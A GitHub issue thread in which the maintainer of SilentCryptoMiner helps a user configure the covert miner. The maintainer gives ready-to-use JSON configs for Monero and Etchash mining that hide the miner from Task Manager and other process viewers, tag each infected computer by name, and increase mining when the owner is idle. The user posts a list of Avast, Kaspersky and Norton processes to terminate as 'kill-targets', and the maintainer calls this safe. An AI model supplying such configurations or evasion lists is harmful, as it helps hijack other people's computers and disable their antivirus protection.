### ISSUE TITLE
Adress Changing

### ISSUE THREAD

**Issue by DARK-DEVIL-66** [UnamSanctam/SilentCryptoMiner#1894]
can i change wallet address in remote config/web config for gpu & cpu minig

**Comment by UnamSanctam** [comment]
Yes, you can see the formats here:
https://github.com/UnamSanctam/SilentCryptoMiner/wiki/XMR-Miner#remote-configuration
https://github.com/UnamSanctam/SilentCryptoMiner/wiki/ETH-Miner#remote-configuration

**Comment by DARK-DEVIL-66** [comment]
why my miner name are showing 0 in 2miners.com but web penal showing orginal name

**Comment by UnamSanctam** [comment]
Do you have a worker name set? Since that's what is shown in the pool.

**Comment by DARK-DEVIL-66** [comment]
![Screenshot 2023-11-02 at 03-18-56 Unam Web Panel Unam Sanctam](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/e4634cf6-4234-40ad-8425-5d8d77384a83)
![Screenshot 2023-11-02 at 03-19-30 Miner Statistics - Best Monero XMR Mining Pool - 2Miners](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/d274bb9c-b2ca-4bfb-8c52-94c2952210c8)

**Comment by DARK-DEVIL-66** [comment]
WEB PENAL SOWING Worker CAARAMBHDES
POOL DASHBOARD SHOWING Worker  0

**Comment by DARK-DEVIL-66** [comment]
THIS MY WEB CONFIGRATION {
	"algo": "rx/0",
	"pool": "xmr.2miners.com",
	"port": 12222,
	"wallet": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC",
	"password": "x",
	"rig-id": "{COMPUTERNAME}",
	"nicehash": false,
	"ssltls": true,
	"max-cpu": 50,
	"idle-wait": 0,
	"idle-cpu": 80,
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
	"kill-targets": "",
	"stealth-fullscreen": false
}

**Comment by DARK-DEVIL-66** [comment]
THIS MY MINER BUILD TIME CONFIGRATION 

{
	"algo": "rx/0",
	"pool": "xmr.2miners.com",
	"port": 12222,
	"wallet": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC",
	"password": "x",
	"nicehash": false,
	"ssltls": true,
	"max-cpu": 20,
	"idle-wait": 4,
	"idle-cpu": 80,
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
	"kill-targets": "",
	"stealth-fullscreen": false
}

**Comment by UnamSanctam** [comment]
Not sure what you mean, if you press the '+' in the web panel then it doesn't show the correct worker name?

**Comment by DARK-DEVIL-66** [comment]
CAN I USE "rig-id": "{COMPUTERNAME}",  AT THE MINER BUILDING

**Comment by DARK-DEVIL-66** [comment]
![Uploading Screenshot 2023-11-02 at 03-24-31 Unam Web Panel Unam Sanctam.png…]()

**Comment by UnamSanctam** [comment]
You can enter the `{COMPUTERNAME}` into the wallet address by separating it with a dot (.) like so: `XMRWallet.{COMPUTERNAME}`

**Comment by DARK-DEVIL-66** [comment]
PLEASE GIVE ME A EXAMPLE FOR CPU & GPU MINING
WEB CONFIG & REMOTE CONFIG FOR HIGH USAGE
I LIKE TO MINE XMR & etchash

**Comment by DARK-DEVIL-66** [comment]
MINING ON 2MINERS.COM HTTPS

**Comment by UnamSanctam** [comment]
Sure.
XMR:
```
{
"algo": "rx/0",
"pool": "xmr.2miners.com",
"port": 12222,
"wallet": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC.{COMPUTERNAME}",
"ssltls": true,
"max-cpu": 50,
"idle-wait": 5,
"idle-cpu": 80,
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
"kill-targets": "",
"stealth-fullscreen": false
}
```

ETC:
```
{
    "url": "stratums://ETC_WALLET.{COMPUTERNAME}@etc.2miners.com:11010",
    "algo": "etchash",
    "max-gpu": 50,
    "idle-wait": 5,
    "idle-gpu": 90,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "",
    "stealth-fullscreen": false
}
```
Though mining Ravencoin (or some other KawPow cryptocurrency) would probably be more profitable for the GPU: https://whattomine.com/.

**Comment by DARK-DEVIL-66** [comment]
> Sure. XMR:
> 
> ```
> {
> "algo": "rx/0",
> "pool": "xmr.2miners.com",
> "port": 12222,
> "wallet": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC.{COMPUTERNAME}",
> "ssltls": true,
> "max-cpu": 50,
> "idle-wait": 5,
> "idle-cpu": 80,
> "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
> "kill-targets": "",
> "stealth-fullscreen": false
> }
> ```
> 
> ETC:
> 
> ```
> {
>     "url": "stratums://ETC_WALLET.{COMPUTERNAME}@etc.2miners.com:11010",
>     "algo": "etchash",
>     "max-gpu": 50,
>     "idle-wait": 5,
>     "idle-gpu": 90,
>     "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
>     "kill-targets": "",
>     "stealth-fullscreen": false
> }
> ```
> 
> Though mining Ravencoin (or some other KawPow cryptocurrency) would probably be more profitable for the GPU: https://whattomine.com/.

IT'S FOR WEB CONFIG  OR REMOTE CONFIG

**Comment by UnamSanctam** [comment]
Yes that is for the "Remote Configuration" and/or web panel "Configurations".

**Comment by DARK-DEVIL-66** [comment]
thank's man

**Comment by DARK-DEVIL-66** [comment]
idle wait 5 is mentotry or optional can i change it 0

**Comment by UnamSanctam** [comment]
You can change it to 0 but using idle can be good if you want the maximum usage. When idle is set to 5 (minutes) then if the mouse or keyboard has not been touched in after 5 minutes then the miner will change its usage from "idle-cpu"/"idle-gpu" to the "idle-cpu"/"idle-gpu" amount of usage. So that they will use more CPU or GPU when the user isn't using the computer.

**Comment by DARK-DEVIL-66** [comment]
it's covered all antivirus

afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,ARestore.exe,asOELnch.exe,buVss.exe,cltLMH.exe,cltRT.exe,coInst.exe,coNatHst.exe,CpySnpt.exe,EFAInst64.exe,elaminst.exe,FLDgHost.exe,InstCA.exe,MCUI32.exe,Navw32.exe,ncolow.exe,NortonSecurity.exe,NSc.exe,nsWscSvc.exe,nuPerfScan.exe,RuleUp.exe,SEFInst.exe,Sevntx64.exe,SRTSP_CA.exe,SymDgnHC.exe,symerr.exe,SymVTCatalogDB.exe,tuIH.exe,uiStub.exe,uiWNSNotificationApp.exe,Upgrade.exe,vpnCA.exe,wa_3rd_party_host_32.exe,wa_3rd_party_host_64.exe,WFPUnins.exe,wpInstCA.exe,WSCStub.exe

**Comment by DARK-DEVIL-66** [comment]
kill target is risky or safe

**Comment by UnamSanctam** [comment]
It should be safe.

**Comment by DARK-DEVIL-66** [comment]
> it's covered all antivirus
> 
> afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,ARestore.exe,asOELnch.exe,buVss.exe,cltLMH.exe,cltRT.exe,coInst.exe,coNatHst.exe,CpySnpt.exe,EFAInst64.exe,elaminst.exe,FLDgHost.exe,InstCA.exe,MCUI32.exe,Navw32.exe,ncolow.exe,NortonSecurity.exe,NSc.exe,nsWscSvc.exe,nuPerfScan.exe,RuleUp.exe,SEFInst.exe,Sevntx64.exe,SRTSP_CA.exe,SymDgnHC.exe,symerr.exe,SymVTCatalogDB.exe,tuIH.exe,uiStub.exe,uiWNSNotificationApp.exe,Upgrade.exe,vpnCA.exe,wa_3rd_party_host_32.exe,wa_3rd_party_host_64.exe,WFPUnins.exe,wpInstCA.exe,WSCStub.exe

it's coverd all antivirus or not ?

**Comment by UnamSanctam** [comment]
Probably not all of them but many of them are included in that.

**Comment by DARK-DEVIL-66** [comment]
if you have all av list bro

**Comment by DARK-DEVIL-66** [comment]
when next update coming on ?

**Comment by UnamSanctam** [comment]
I sadly don't have a list of all of them.

>when next update coming on ?

Right now I'm trying to finish the update since I'm done with most of it but since I also have a lot of real life work at the moment so I'm not sure when it will be released.

**Comment by DARK-DEVIL-66** [comment]
> I sadly don't have a list of all of them.
> 
> > when next update coming on ?
> 
> Right now I'm trying to finish the update since I'm done with most of it but since I also have a lot of real life work at the moment so I'm not sure when it will be released.

i will try to make donation in future for you bro your hardwork are really appricated !

**Comment by DARK-DEVIL-66** [comment]
thank's take time to clear my doubt's ......

**Comment by DARK-DEVIL-66** [comment]
Stay hapy !
